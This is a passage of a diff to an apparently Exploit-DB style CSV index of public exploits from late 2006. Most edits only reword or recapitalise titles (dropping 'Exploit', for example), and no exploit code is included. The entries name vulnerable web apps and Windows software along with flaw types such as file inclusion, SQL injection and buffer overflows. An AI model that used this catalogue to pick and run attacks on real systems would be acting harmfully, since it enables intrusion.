Ince",php,webapps,0 -2674,platforms/php/webapps/2674.php,"MySource CMS 2.16.2 - (init_mysource.php) Remote File Inclusion Exploit",2006-10-29,Kacper,php,webapps,0 +2673,platforms/php/webapps/2673.txt,"Simple Website Software 0.99 - 'common.php' File Include",2006-10-29,"Mehmet Ince",php,webapps,0 +2674,platforms/php/webapps/2674.php,"MySource CMS 2.16.2 - (init_mysource.php) Remote File Inclusion",2006-10-29,Kacper,php,webapps,0 2675,platforms/php/webapps/2675.asp,"PHPEasyData Pro 2.2.2 - 'index.php' SQL Injection",2006-10-29,ajann,php,webapps,0 2676,platforms/windows/local/2676.cpp,"Kaspersky Internet Security 6.0.0.303 - IOCTL KLICK Local Exploit",2006-10-29,Nanika,windows,local,0 2677,platforms/php/webapps/2677.asp,"Netref 4 - 'cat_for_aff.php' Source Code Disclosure Exploit",2006-10-29,ajann,php,webapps,0 2678,platforms/php/webapps/2678.txt,"Faq Administrator 2.1 - (faq_reply.php) Remote File Inclusion",2006-10-29,v1per-haCker,php,webapps,0 2679,platforms/php/webapps/2679.txt,"PHPMyRing 4.2.1 - (cherche.php) SQL Injection",2006-10-29,ajann,php,webapps,0 2680,platforms/windows/remote/2680.pm,"PrivateWire Gateway 3.7 (Windows/x86) - Remote Buffer Overflow (Metasploit)",2006-10-29,"Michael Thumann",windows,remote,80 -2681,platforms/php/webapps/2681.txt,"QnECMS 2.5.6 - (adminfolderpath) Remote File Inclusion Exploit",2006-10-30,K-159,php,webapps,0 +2681,platforms/php/webapps/2681.txt,"QnECMS 2.5.6 - (adminfolderpath) Remote File Inclusion",2006-10-30,K-159,php,webapps,0 2682,platforms/windows/dos/2682.pl,"Microsoft Windows - NAT Helper Components Remote Denial of Service (Perl)",2006-10-30,x82,windows,dos,0 2683,platforms/asp/webapps/2683.txt,"Techno Dreams Announcement - (key) SQL Injection",2006-10-30,ajann,asp,webapps,0 -2684,platforms/asp/webapps/2684.txt,"Techno Dreams GuestBook 1.0 - (key) SQL Injection",2006-10-30,ajann,asp,webapps,0 -2685,platforms/php/webapps/2685.php,"Nitrotech 0.0.3a - (includes/common.php) Remote Code Execution Exploit",2006-10-30,Kacper,php,webapps,0 +2684,platforms/asp/webapps/2684.txt,"Techno Dreams Guestbook 1.0 - (key) SQL Injection",2006-10-30,ajann,asp,webapps,0 +2685,platforms/php/webapps/2685.php,"Nitrotech 0.0.3a - (includes/common.php) Remote Code Execution",2006-10-30,Kacper,php,webapps,0 2686,platforms/php/webapps/2686.php,"phpBB Spider Friendly Module 1.3.10 - File Include Exploit",2006-10-30,Kacper,php,webapps,0 2687,platforms/php/webapps/2687.htm,"E Annu 1.0 - Login Bypass SQL Injection",2006-10-30,ajann,php,webapps,0 2688,platforms/php/webapps/2688.txt,"phpProfiles 2.1 Beta - Multiple Remote File Inclusion",2006-10-30,v1per-haCker,php,webapps,0 @@ -2388,29 +2389,29 @@ id,file,description,date,author,platform,type,port 2694,platforms/php/webapps/2694.php,"T.G.S. CMS 0.1.7 - (logout.php) SQL Injection",2006-10-31,Kacper,php,webapps,0 2695,platforms/multiple/dos/2695.html,"Mozilla Firefox 1.5.0.7/2.0 - (createRange) Remote Denial of Service",2006-10-31,"Gotfault Security",multiple,dos,0 2696,platforms/php/webapps/2696.php,"Invision Power Board 2.1.7 - (Debug) Remote Password Change Exploit",2006-11-01,Rapigator,php,webapps,0 -2697,platforms/php/webapps/2697.php,"Innovate Portal 2.0 - (acp.php) Remote Code Execution Exploit",2006-11-01,Kacper,php,webapps,0 +2697,platforms/php/webapps/2697.php,"Innovate Portal 2.0 - (acp.php) Remote Code Execution",2006-11-01,Kacper,php,webapps,0 2698,platforms/php/webapps/2698.pl,"2BGal 3.0 - (admin/configuration.inc.php) Local Inclusion Exploit",2006-11-01,Kw3[R]Ln,php,webapps,0 2699,platforms/windows/remote/2699.c,"EFS Easy Address Book Web Server 1.2 - Remote File Stream Exploit",2006-11-01,"Greg Linares",windows,remote,0 2700,platforms/hardware/dos/2700.rb,"Apple Airport - 802.11 Probe Response Kernel Memory Corruption PoC (Metasploit)",2006-11-01,"H D Moore",hardware,dos,0 2701,platforms/php/webapps/2701.txt,"TikiWiki 1.9.5 Sirius - (sort_mode) Information Disclosure",2006-11-01,securfrog,php,webapps,0 -2702,platforms/php/webapps/2702.php,"Lithium CMS 4.04c - (classes/index.php) Local File Inclusion Exploit",2006-11-02,Kacper,php,webapps,0 +2702,platforms/php/webapps/2702.php,"Lithium CMS 4.04c - (classes/index.php) Local File Inclusion",2006-11-02,Kacper,php,webapps,0 2703,platforms/php/webapps/2703.txt,"Article System 0.6 - (volume.php) Remote File Inclusion",2006-11-02,GregStar,php,webapps,0 -2704,platforms/php/webapps/2704.txt,"freewebshop.org script 2.2.2 - Multiple Vulnerabilities",2006-11-02,Spiked,php,webapps,0 -2706,platforms/php/webapps/2706.txt,"MODx CMS 0.9.2.1 - (FCKeditor) Remote File Inclusion",2006-11-03,nuffsaid,php,webapps,0 -2707,platforms/php/webapps/2707.php,"PostNuke 0.763 - (PNSV lang) Remote Code Execution Exploit",2006-11-03,Kacper,php,webapps,0 +2704,platforms/php/webapps/2704.txt,"FreeWebShop.org script 2.2.2 - Multiple Vulnerabilities",2006-11-02,Spiked,php,webapps,0 +2706,platforms/php/webapps/2706.txt,"MODx CMS 0.9.2.1 - 'FCKeditor' Remote File Inclusion",2006-11-03,nuffsaid,php,webapps,0 +2707,platforms/php/webapps/2707.php,"PostNuke 0.763 - (PNSV lang) Remote Code Execution",2006-11-03,Kacper,php,webapps,0 2708,platforms/windows/dos/2708.c,"Nullsoft Winamp 5.3 - (Ultravox-Max-Msg) Heap Overflow Denial of Service (PoC)",2006-11-03,cocoruder,windows,dos,0 2709,platforms/php/webapps/2709.txt,"Creasito E-Commerce Content Manager - (admin) Authentication Bypass",2006-11-03,SlimTim10,php,webapps,0 2710,platforms/php/webapps/2710.txt,"Ariadne 2.4 - store_config[code] Remote File Inclusion",2006-11-04,"Mehmet Ince",php,webapps,0 -2711,platforms/php/webapps/2711.php,"e107 <= 0.75 - (e107language_e107cookie) Local File Inclusion Exploit",2006-11-04,Kacper,php,webapps,0 -2712,platforms/php/webapps/2712.php,"MDPro 1.0.76 - (Cookie: PNSVlang) Local File Inclusion Exploit",2006-11-04,Kacper,php,webapps,0 +2711,platforms/php/webapps/2711.php,"e107 <= 0.75 - (e107language_e107cookie) Local File Inclusion",2006-11-04,Kacper,php,webapps,0 +2712,platforms/php/webapps/2712.php,"MDPro 1.0.76 - (Cookie: PNSVlang) Local File Inclusion",2006-11-04,Kacper,php,webapps,0 2713,platforms/php/webapps/2713.txt,"Drake CMS < 0.2.3 ALPHA rev.916 - Remote File Inclusion",2006-11-04,GregStar,php,webapps,0 2714,platforms/php/webapps/2714.pl,"PHPKIT 1.6.1R2 - (search_user) SQL Injection",2006-11-04,x23,php,webapps,0 2715,platforms/windows/dos/2715.pl,"XM Easy Personal FTP Server 5.2.1 - Remote Denial of Service",2006-11-04,boecke,windows,dos,0 2716,platforms/windows/dos/2716.pl,"Essentia Web Server 2.15 - (GET Request) Remote Denial of Service",2006-11-04,CorryL,windows,dos,0 2717,platforms/php/webapps/2717.txt,"phpDynaSite 3.2.2 - (racine) Remote File Inclusion",2006-11-04,DeltahackingTEAM,php,webapps,0 2718,platforms/php/webapps/2718.txt,"SazCart 1.5 - (cart.php) Remote File Inclusion",2006-11-04,IbnuSina,php,webapps,0 -2719,platforms/php/webapps/2719.php,"Quick.Cms.Lite 0.3 - (Cookie sLanguage) Local File Inclusion Exploit",2006-11-05,Kacper,php,webapps,0 -2720,platforms/php/webapps/2720.pl,"PHP Classifieds 7.1 - (detail.php) SQL Injection",2006-11-05,ajann,php,webapps,0 +2719,platforms/php/webapps/2719.php,"Quick.Cms.Lite 0.3 - (Cookie sLanguage) Local File Inclusion",2006-11-05,Kacper,php,webapps,0 +2720,platforms/php/webapps/2720.pl,"PHP Classifieds 7.1 - 'detail.php' SQL Injection",2006-11-05,ajann,php,webapps,0 2721,platforms/php/webapps/2721.php,"Ultimate PHP Board 2.0 - (header_simple.php) File Include Exploit",2006-11-05,Kacper,php,webapps,0 2722,platforms/php/webapps/2722.pl,"Webdrivers Simple Forum - 'message_details.php' SQL Injection",2006-11-05,Bl0od3r,php,webapps,0 2724,platforms/php/webapps/2724.txt,"Soholaunch Pro 4.9 r36 - Remote File Inclusion",2006-11-06,the_day,php,webapps,0 @@ -2426,74 +2427,74 @@ id,file,description,date,author,platform,type,port 2734,platforms/windows/dos/2734.py,"WFTPD Pro Server 3.23.1.1 - (APPE) Remote Buffer Overflow (PoC)",2006-11-07,"Joxean Koret",windows,dos,0 2735,platforms/windows/dos/2735.py,"WarFTPd 1.82.00-RC11 - Remote Denial of Service",2006-11-07,"Joxean Koret",windows,dos,0 2736,platforms/php/webapps/2736.txt,"PHPAdventure 1.1 - (ad_main.php) Remote File Inclusion",2006-11-07,HER0,php,webapps,0 -2737,platforms/osx/local/2737.pl,"Xcode OpenBase 10.0.0 (OSX) - (symlink) Privilege Escalation",2006-11-08,"Kevin Finisterre",osx,local,0 -2738,platforms/osx/local/2738.pl,"Xcode OpenBase 10.0.0 (OSX) - (unsafe system call) Privilege Escalation",2006-11-08,"Kevin Finisterre",osx,local,0 +2737,platforms/osx/local/2737.pl,"Xcode OpenBase 10.0.0 (OS X) - (symlink) Privilege Escalation",2006-11-08,"Kevin Finisterre",osx,local,0 +2738,platforms/osx/local/2738.pl,"Xcode OpenBase 10.0.0 (OS X) - (unsafe system call) Privilege Escalation",2006-11-08,"Kevin Finisterre",osx,local,0 2739,platforms/php/webapps/2739.txt,"iPrimal Forums - 'admin/index.php' Remote File Inclusion",2006-11-08,Bl0od3r,php,webapps,0 2740,platforms/php/webapps/2740.txt,"vBlog / C12 0.1 - (cfgProgDir) Remote File Inclusion",2006-11-08,DeltahackingTEAM,php,webapps,0 2741,platforms/php/webapps/2741.txt,"IrayoBlog 0.2.4 - (inc/irayofuncs.php) Remote File Inclusion",2006-11-08,DeltahackingTEAM,php,webapps,0 2742,platforms/php/webapps/2742.txt,"DodosMail 2.0.1 - (dodosmail.php) Remote File Inclusion",2006-11-08,"Cold Zero",php,webapps,0 -2743,platforms/windows/remote/2743.html,"Microsoft Internet Explorer 6/7 - (XML Core Services) Remote Code Execution Exploit (1)",2006-11-08,anonymous,windows,remote,0 +2743,platforms/windows/remote/2743.html,"Microsoft Internet Explorer 6/7 - (XML Core Services) Remote Code Execution (1)",2006-11-08,anonymous,windows,remote,0 2744,platforms/php/webapps/2744.txt,"LetterIt 2.0 - (inc/session.php) Remote File Inclusion",2006-11-09,v1per-haCker,php,webapps,0 2745,platforms/php/webapps/2745.txt,"gtcatalog 0.9.1 - 'index.php' Remote File Inclusion",2006-11-09,v1per-haCker,php,webapps,0 2746,platforms/asp/webapps/2746.pl,"AspPired2Poll 1.0 - (MoreInfo.asp) SQL Injection",2006-11-09,ajann,asp,webapps,0 2747,platforms/php/webapps/2747.txt,"MyAlbum 3.02 - (language.inc.php) Remote File Inclusion",2006-11-09,"Silahsiz Kuvvetler",php,webapps,0 -2748,platforms/php/webapps/2748.pl,"PHPManta 1.0.2 - (view-sourcecode.php) Local File Inclusion Exploit",2006-11-09,ajann,php,webapps,0 -2749,platforms/windows/remote/2749.html,"Microsoft Internet Explorer 6/7 - (XML Core Services) Remote Code Execution Exploit (2)",2006-11-10,~Fyodor,windows,remote,0 +2748,platforms/php/webapps/2748.pl,"PHPManta 1.0.2 - (view-sourcecode.php) Local File Inclusion",2006-11-09,ajann,php,webapps,0 +2749,platforms/windows/remote/2749.html,"Microsoft Internet Explorer 6/7 - (XML Core Services) Remote Code Execution (2)",2006-11-10,~Fyodor,windows,remote,0 2750,platforms/php/webapps/2750.txt,"EncapsCMS 0.3.6 - (core/core.php) Remote File Inclusion",2006-11-10,Firewall,php,webapps,0 2751,platforms/php/webapps/2751.txt,"BrewBlogger 1.3.1 - (printLog.php) SQL Injection",2006-11-10,"Craig Heffner",php,webapps,0 2752,platforms/php/webapps/2752.txt,"WORK System E-Commerce 3.0.1 - Remote File Inclusion",2006-11-10,SlimTim10,php,webapps,0 -2753,platforms/windows/remote/2753.c,"Microsoft Internet Explorer 6/7 - (XML Core Services) Remote Code Execution Exploit (3)",2006-11-10,M03,windows,remote,0 +2753,platforms/windows/remote/2753.c,"Microsoft Internet Explorer 6/7 - (XML Core Services) Remote Code Execution (3)",2006-11-10,M03,windows,remote,0 2754,platforms/asp/webapps/2754.pl,"NuCommunity 1.0 - (cl_CatListing.asp) SQL Injection",2006-11-11,ajann,asp,webapps,0 2755,platforms/asp/webapps/2755.pl,"NuRems 1.0 - (propertysdetails.asp) SQL Injection",2006-11-11,ajann,asp,webapps,0 2756,platforms/asp/webapps/2756.txt,"NuStore 1.0 - (Products.asp) SQL Injection",2006-11-11,ajann,asp,webapps,0 2757,platforms/asp/webapps/2757.pl,"NuSchool 1.0 - (CampusNewsDetails.asp) SQL Injection",2006-11-11,ajann,asp,webapps,0 -2758,platforms/php/webapps/2758.php,"phpwcms 1.2.6 - (Cookie: wcs_user_lang) Local File Inclusion Exploit",2006-11-11,Kacper,php,webapps,0 +2758,platforms/php/webapps/2758.php,"phpwcms 1.2.6 - (Cookie: wcs_user_lang) Local File Inclusion",2006-11-11,Kacper,php,webapps,0 2759,platforms/php/webapps/2759.php,"PHPWind 5.0.1 - (AdminUser) Blind SQL Injection",2006-11-12,rgod,php,webapps,0 -2760,platforms/php/webapps/2760.php,"Rama CMS 0.68 - (Cookie: lang) Local File Inclusion Exploit",2006-11-12,Kacper,php,webapps,0 +2760,platforms/php/webapps/2760.php,"Rama CMS 0.68 - (Cookie: lang) Local File Inclusion",2006-11-12,Kacper,php,webapps,0 2761,platforms/asp/webapps/2761.pl,"Munch Pro 1.0 - (switch.asp) SQL Injection",2006-11-12,ajann,asp,webapps,0 2762,platforms/asp/webapps/2762.asp,"ASPPortal 4.0.0 - (default1.asp) SQL Injection",2006-11-12,ajann,asp,webapps,0 2763,platforms/asp/webapps/2763.txt,"UStore 1.0 - (detail.asp) SQL Injection",2006-11-12,ajann,asp,webapps,0 2764,platforms/asp/webapps/2764.txt,"USupport 1.0 - (detail.asp) SQL Injection",2006-11-12,ajann,asp,webapps,0 2765,platforms/asp/webapps/2765.txt,"UPublisher 1.0 - (viewarticle.asp) SQL Injection",2006-11-12,ajann,asp,webapps,0 -2766,platforms/php/webapps/2766.pl,"CMSmelborp Beta - 'user_standard.php' Remote File Inclusion Exploit",2006-11-12,DeltahackingTEAM,php,webapps,0 -2767,platforms/php/webapps/2767.txt,"StoryStream 4.0 - (baseDir) Remote File Inclusion",2006-11-12,v1per-haCker,php,webapps,0 -2768,platforms/php/webapps/2768.txt,"contentnow 1.30 - (Local File Include / Arbitrary File Upload / Delete) Multiple Vulnerabilities",2006-11-13,r0ut3r,php,webapps,0 -2769,platforms/php/webapps/2769.php,"Quick.Cart 2.0 - (actions_client/gallery.php) Local File Inclusion Exploit",2006-11-13,Kacper,php,webapps,0 +2766,platforms/php/webapps/2766.pl,"CMSmelborp Beta - 'user_standard.php' Remote File Inclusion",2006-11-12,DeltahackingTEAM,php,webapps,0 +2767,platforms/php/webapps/2767.txt,"StoryStream 4.0 - 'baseDir' Remote File Inclusion",2006-11-12,v1per-haCker,php,webapps,0 +2768,platforms/php/webapps/2768.txt,"ContentNow 1.30 - (Local File Include / Arbitrary File Upload / Delete) Multiple Vulnerabilities",2006-11-13,r0ut3r,php,webapps,0 +2769,platforms/php/webapps/2769.php,"Quick.Cart 2.0 - (actions_client/gallery.php) Local File Inclusion",2006-11-13,Kacper,php,webapps,0 2770,platforms/windows/remote/2770.rb,"Broadcom Wireless Driver - Probe Response SSID Overflow (Metasploit)",2006-11-13,"H D Moore",windows,remote,0 2771,platforms/windows/remote/2771.rb,"D-Link DWL-G132 - Wireless Driver Beacon Rates Overflow (Metasploit)",2006-11-13,"H D Moore",windows,remote,0 2772,platforms/asp/webapps/2772.htm,"Online Event Registration 2.0 - (save_profile.asp) Pass Change Exploit",2006-11-13,ajann,asp,webapps,0 -2773,platforms/asp/webapps/2773.txt,"Estate Agent Manager 1.3 - (default.asp) Login Bypass",2006-11-13,ajann,asp,webapps,0 +2773,platforms/asp/webapps/2773.txt,"Estate Agent Manager 1.3 - 'default.asp' Login Bypass",2006-11-13,ajann,asp,webapps,0 2774,platforms/asp/webapps/2774.txt,"Property Pro 1.0 - (vir_Login.asp) Remote Login Bypass",2006-11-13,ajann,asp,webapps,0 2775,platforms/php/webapps/2775.txt,"Phpjobscheduler 3.0 - (installed_config_file) File Inclusion",2006-11-13,Firewall,php,webapps,0 -2776,platforms/php/webapps/2776.txt,"contentnow 1.30 - (File Upload / Cross-Site Scripting) Multiple Vulnerabilities",2006-11-14,Timq,php,webapps,0 +2776,platforms/php/webapps/2776.txt,"ContentNow 1.30 - (File Upload / Cross-Site Scripting) Multiple Vulnerabilities",2006-11-14,Timq,php,webapps,0 2777,platforms/php/webapps/2777.txt,"Aigaion 1.2.1 - (DIR) Remote File Inclusion",2006-11-14,navairum,php,webapps,0 2778,platforms/php/webapps/2778.txt,"PHPPeanuts 1.3 Beta - (Inspect.php) Remote File Inclusion",2006-11-14,"Hidayat Sagita",php,webapps,0 -2779,platforms/asp/webapps/2779.txt,"ASP Smiley 1.0 - (default.asp) Login Bypass SQL Injection",2006-11-14,ajann,asp,webapps,0 +2779,platforms/asp/webapps/2779.txt,"ASP Smiley 1.0 - 'default.asp' Login Bypass SQL Injection",2006-11-14,ajann,asp,webapps,0 2780,platforms/asp/webapps/2780.txt,"NetVIOS 2.0 - (page.asp) SQL Injection",2006-11-14,ajann,asp,webapps,0 2781,platforms/asp/webapps/2781.txt,"blogme 3.0 - (Cross-Site Scripting / Authentication Bypass) Multiple Vulnerabilities",2006-11-14,"Security Access Point",asp,webapps,0 2782,platforms/asp/webapps/2782.txt,"Hpecs Shopping Cart - Remote Login Bypass",2006-11-14,"Security Access Point",asp,webapps,0 2783,platforms/windows/dos/2783.html,"WinZip 10.0.7245 - (FileView ActiveX Control) Stack Overflow (PoC)",2006-11-14,prdelka,windows,dos,0 -2784,platforms/multiple/remote/2784.html,"Links 1.00pre12 - (smbclient) Remote Code Execution Exploit",2006-11-14,"Teemu Salmela",multiple,remote,0 +2784,platforms/multiple/remote/2784.html,"Links 1.00pre12 - (smbclient) Remote Code Execution",2006-11-14,"Teemu Salmela",multiple,remote,0 2785,platforms/windows/remote/2785.c,"WinZip 10.0.7245 - (FileView ActiveX) Remote Buffer Overflow",2006-11-15,prdelka,windows,remote,0 2786,platforms/php/webapps/2786.txt,"torrentflux 2.2 - (Arbitrary File Create/ Execute / Delete) Multiple Vulnerabilities",2006-11-15,r0ut3r,php,webapps,0 2787,platforms/windows/dos/2787.c,"UniversalFTP 1.0.50 - (MKD) Remote Denial of Service",2006-11-15,"Greg Linares",windows,dos,0 -2788,platforms/osx/local/2788.pl,"Kerio WebSTAR 5.4.2 (OSX) - (libucache.dylib) Privilege Escalation",2006-11-15,"Kevin Finisterre",osx,local,0 +2788,platforms/osx/local/2788.pl,"Kerio WebSTAR 5.4.2 (OS X) - (libucache.dylib) Privilege Escalation",2006-11-15,"Kevin Finisterre",osx,local,0 2789,platforms/windows/remote/2789.cpp,"Microsoft Windows - NetpManageIPCConnect Stack Overflow (MS06-070)",2006-11-16,cocoruder,windows,remote,0 -2790,platforms/php/webapps/2790.pl,"Etomite CMS 0.6.1.2 - (manager/index.php) Local File Inclusion Exploit",2006-11-16,Revenge,php,webapps,0 +2790,platforms/php/webapps/2790.pl,"Etomite CMS 0.6.1.2 - (manager/index.php) Local File Inclusion",2006-11-16,Revenge,php,webapps,0 2791,platforms/php/webapps/2791.txt,"HTTP Upload Tool - 'download.php' Information Disclosure",2006-11-16,"Craig Heffner",php,webapps,0 2794,platforms/php/webapps/2794.txt,"mg.applanix 1.3.1 - (apx_root_path) Remote File Inclusion",2006-11-17,v1per-haCker,php,webapps,0 2795,platforms/php/webapps/2795.txt,"DoSePa 1.0.4 - (textview.php) Information Disclosure",2006-11-17,"Craig Heffner",php,webapps,0 -2796,platforms/php/webapps/2796.php,"miniCWB 1.0.0 - (contact.php) Local File Inclusion Exploit",2006-11-17,Kacper,php,webapps,0 +2796,platforms/php/webapps/2796.php,"miniCWB 1.0.0 - (contact.php) Local File Inclusion",2006-11-17,Kacper,php,webapps,0 2797,platforms/php/webapps/2797.txt,"Powies pForum 1.29a - (editpoll.php) SQL Injection",2006-11-17,SHiKaA,php,webapps,0 2798,platforms/php/webapps/2798.txt,"Powies MatchMaker 4.05 - (matchdetail.php) SQL Injection",2006-11-17,SHiKaA,php,webapps,0 2799,platforms/php/webapps/2799.txt,"mxBB Module calsnails 1.06 - (mx_common.php) File Include",2006-11-17,bd0rk,php,webapps,0 2800,platforms/windows/remote/2800.cpp,"Microsoft Windows - Wkssvc NetrJoinDomain2 Stack Overflow (MS06-070)",2006-11-17,"S A Stevens",windows,remote,0 -2807,platforms/php/webapps/2807.pl,"MosReporter Joomla Component 0.9.3 - Remote File Inclusion Exploit",2006-11-17,Crackers_Child,php,webapps,0 +2807,platforms/php/webapps/2807.pl,"MosReporter Joomla Component 0.9.3 - Remote File Inclusion",2006-11-17,Crackers_Child,php,webapps,0 2808,platforms/php/webapps/2808.txt,"Dicshunary 0.1a - (check_status.php) Remote File Inclusion",2006-11-17,DeltahackingTEAM,php,webapps,0 -2809,platforms/windows/remote/2809.py,"Microsoft Windows NetpManageIPCConnect - Stack Overflow (Python)",2006-11-18,"Winny Thomas",windows,remote,445 +2809,platforms/windows/remote/2809.py,"Microsoft Windows - NetpManageIPCConnect - Stack Overflow (Python)",2006-11-18,"Winny Thomas",windows,remote,445 2810,platforms/php/webapps/2810.php,"Oxygen 1.1.3 - (O2PHP Bulletin Board) SQL Injection",2006-11-18,DarkFig,php,webapps,0 2811,platforms/php/webapps/2811.txt,"PHPWebThings 1.5.2 - (editor.php) Remote File Inclusion",2006-11-18,nuffsaid,php,webapps,0 -2812,platforms/php/webapps/2812.pl,"PHP Easy Downloader 1.5 - (save.php) Remote Code Execution Exploit",2006-11-18,nuffsaid,php,webapps,0 +2812,platforms/php/webapps/2812.pl,"PHP Easy Downloader 1.5 - (save.php) Remote Code Execution",2006-11-18,nuffsaid,php,webapps,0 2813,platforms/asp/webapps/2813.txt,"ASPNuke 0.80 - (register.asp) SQL Injection",2006-11-19,ajann,asp,webapps,0 2814,platforms/php/webapps/2814.txt,"PHPQuickGallery 1.9 - (textFile) Remote File Inclusion",2006-11-19,"Al7ejaz Hacker",php,webapps,0 2815,platforms/windows/local/2815.c,"XMPlay 3.3.0.4 - (M3U Filename) Local Buffer Overflow",2006-11-20,"Greg Linares",windows,local,0 @@ -2522,7 +2523,7 @@ id,file,description,date,author,platform,type,port 2840,platforms/php/webapps/2840.txt,"PEGames - 'index.php' Remote File Inclusion",2006-11-23,DeltahackingTEAM,php,webapps,0 2841,platforms/php/webapps/2841.php,"Woltlab Burning Board Lite 1.0.2 - decode_cookie() SQL Injection",2006-11-24,rgod,php,webapps,0 2842,platforms/php/webapps/2842.php,"Woltlab Burning Board Lite 1.0.2 - Blind SQL Injection",2006-11-23,rgod,php,webapps,0 -2843,platforms/php/webapps/2843.pl,"PHP-Nuke NukeAI Module 3b - 'util.php' Remote File Inclusion Exploit",2006-11-24,DeltahackingTEAM,php,webapps,0 +2843,platforms/php/webapps/2843.pl,"PHP-Nuke NukeAI Module 3b - 'util.php' Remote File Inclusion",2006-11-24,DeltahackingTEAM,php,webapps,0 2844,platforms/php/webapps/2844.pl,"Cahier de texte 2.0 - (Database Backup/Source Disclosure) Remote Exploit",2006-11-24,DarkFig,php,webapps,0 2846,platforms/asp/webapps/2846.txt,"Liberum Help Desk 0.97.3 - (details.asp) SQL Injection",2006-11-25,ajann,asp,webapps,0 2847,platforms/php/webapps/2847.txt,"Sisfo Kampus 0.8 - Remote File Inclusion / Download",2006-11-25,"Wawan Firmansyah",php,webapps,0 @@ -2545,8 +2546,8 @@ id,file,description,date,author,platform,type,port 2864,platforms/php/webapps/2864.txt,"b2evolution 1.8.5 - 1.9b (import-mt.php) Remote File Inclusion",2006-11-29,tarkus,php,webapps,0 2865,platforms/windows/remote/2865.rb,"3Com TFTP Service 2.0.1 - (Long Transporting Mode) Overflow Exploit",2006-11-30,cthulhu,windows,remote,69 2866,platforms/windows/remote/2866.html,"Acer LunchApp.APlunch - (ActiveX Control) Command Execution Exploit",2006-11-30,"Tan Chew Keong",windows,remote,0 -2867,platforms/php/webapps/2867.php,"PHPGraphy 0.9.12 - Privilege Escalation / Commands Execution Exploit",2006-11-30,rgod,php,webapps,0 -2869,platforms/php/webapps/2869.php,"Serendipity 1.0.3 - (comment.php) Local File Inclusion Exploit",2006-11-30,Kacper,php,webapps,0 +2867,platforms/php/webapps/2867.php,"phpGraphy 0.9.12 - Privilege Escalation / Commands Execution Exploit",2006-11-30,rgod,php,webapps,0 +2869,platforms/php/webapps/2869.php,"Serendipity 1.0.3 - 'comment.php' Local File Inclusion",2006-11-30,Kacper,php,webapps,0 2870,platforms/windows/remote/2870.rb,"VUPlayer 2.44 - '.m3u' UNC Name Buffer Overflow (Metasploit)",2006-11-30,"Greg Linares",windows,remote,0 2871,platforms/php/webapps/2871.txt,"LDU 8.x - (polls.php) SQL Injection",2006-11-30,ajann,php,webapps,0 2872,platforms/windows/local/2872.c,"VUPlayer 2.44 - '.m3u' UNC Name Buffer Overflow",2006-11-30,Expanders,windows,local,0 @@ -2564,61 +2565,61 @@ id,file,description,date,author,platform,type,port 2885,platforms/php/webapps/2885.txt,"mxBB Module mx_tinies 1.3.0 - Remote File Inclusion",2006-12-02,bd0rk,php,webapps,0 2886,platforms/php/webapps/2886.txt,"PHP Upload Center 2.0 - (activate.php) File Inclusion",2006-12-03,GregStar,php,webapps,0 2887,platforms/windows/remote/2887.pl,"AT-TFTP 1.9 - (Long Filename) Remote Buffer Overflow Exploit",2006-12-03,"Jacopo Cervini",windows,remote,69 -2888,platforms/php/webapps/2888.php,"Envolution 1.1.0 - (PNSVlang) Remote Code Execution Exploit",2006-12-03,Kacper,php,webapps,0 -2889,platforms/php/webapps/2889.pl,"QuickCart 2.0 - (categories.php) Local File Inclusion Exploit",2006-12-03,r0ut3r,php,webapps,0 +2888,platforms/php/webapps/2888.php,"Envolution 1.1.0 - (PNSVlang) Remote Code Execution",2006-12-03,Kacper,php,webapps,0 +2889,platforms/php/webapps/2889.pl,"QuickCart 2.0 - (categories.php) Local File Inclusion",2006-12-03,r0ut3r,php,webapps,0 2890,platforms/php/webapps/2890.txt,"PHP-revista 1.1.2 - (adodb) Multiple Remote File Inclusion",2006-12-03,"Cold Zero",php,webapps,0 2891,platforms/php/webapps/2891.txt,"cutenews aj-fork 167f - (cutepath) Remote File Inclusion",2006-12-04,DeltahackingTEAM,php,webapps,0 -2892,platforms/linux/dos/2892.py,"F-Prot Antivirus 4.6.6 - (ACE) Denial of Service",2006-12-04,"Evgeny Legerov",linux,dos,0 -2893,platforms/linux/dos/2893.py,"F-Prot Antivirus 4.6.6 - (CHM) Heap Overflow (PoC)",2006-12-04,"Evgeny Legerov",linux,dos,0 -2894,platforms/php/webapps/2894.txt,"Phorum 3.2.11 - (common.php) Remote File Inclusion",2006-12-06,Mr-m07,php,webapps,0 -2895,platforms/php/webapps/2895.pl,"J-OWAMP Web Interface 2.1b - (link) Remote File Inclusion Exploit",2006-12-07,3l3ctric-Cracker,php,webapps,0 +2892,platforms/linux/dos/2892.py,"F-Prot AntiVirus 4.6.6 - (ACE) Denial of Service",2006-12-04,"Evgeny Legerov",linux,dos,0 +2893,platforms/linux/dos/2893.py,"F-Prot AntiVirus 4.6.6 - (CHM) Heap Overflow (PoC)",2006-12-04,"Evgeny Legerov",linux,dos,0 +2894,platforms/php/webapps/2894.txt,"Phorum 3.2.11 - 'common.php' Remote File Inclusion",2006-12-06,Mr-m07,php,webapps,0 +2895,platforms/php/webapps/2895.pl,"J-OWAMP Web Interface 2.1b - (link) Remote File Inclusion",2006-12-07,3l3ctric-Cracker,php,webapps,0 2896,platforms/php/webapps/2896.txt,"Tucows Client Code Suite (CSS) 1.2.1015 - File Include",2006-12-08,3l3ctric-Cracker,php,webapps,0 2897,platforms/php/webapps/2897.txt,"CM68 News 12.02.06 - (addpth) Remote File Inclusion",2006-12-08,"Paul Bakoyiannis",php,webapps,0 2898,platforms/php/webapps/2898.txt,"ThinkEdit 1.9.2 - (render.php) Remote File Inclusion",2006-12-08,r0ut3r,php,webapps,0 2899,platforms/php/webapps/2899.txt,"paFileDB 3.5.2/3.5.3 - Remote Login Bypass SQL Injection",2006-12-08,koray,php,webapps,0 2900,platforms/windows/dos/2900.py,"Microsoft Windows - DNS Resolution Remote Denial of Service PoC (MS06-041)",2006-12-09,"Winny Thomas",windows,dos,0 -2901,platforms/windows/dos/2901.php,"Filezilla FTP Server 0.9.20b/0.9.21 - (STOR) Denial of Service",2006-12-09,rgod,windows,dos,0 +2901,platforms/windows/dos/2901.php,"FileZilla FTP Server 0.9.20b/0.9.21 - (STOR) Denial of Service",2006-12-09,rgod,windows,dos,0 2902,platforms/php/webapps/2902.pl,"TorrentFlux 2.2 - (downloaddetails.php) Local File Disclosure Exploit",2006-12-09,r0ut3r,php,webapps,0 2903,platforms/php/webapps/2903.pl,"TorrentFlux 2.2 - (maketorrent.php) Remote Command Execution Exploit",2006-12-09,r0ut3r,php,webapps,0 2904,platforms/php/webapps/2904.txt,"mxBB Module Profile CP 0.91c - Remote File Inclusion",2006-12-09,bd0rk,php,webapps,0 2905,platforms/php/webapps/2905.txt,"Gizzar 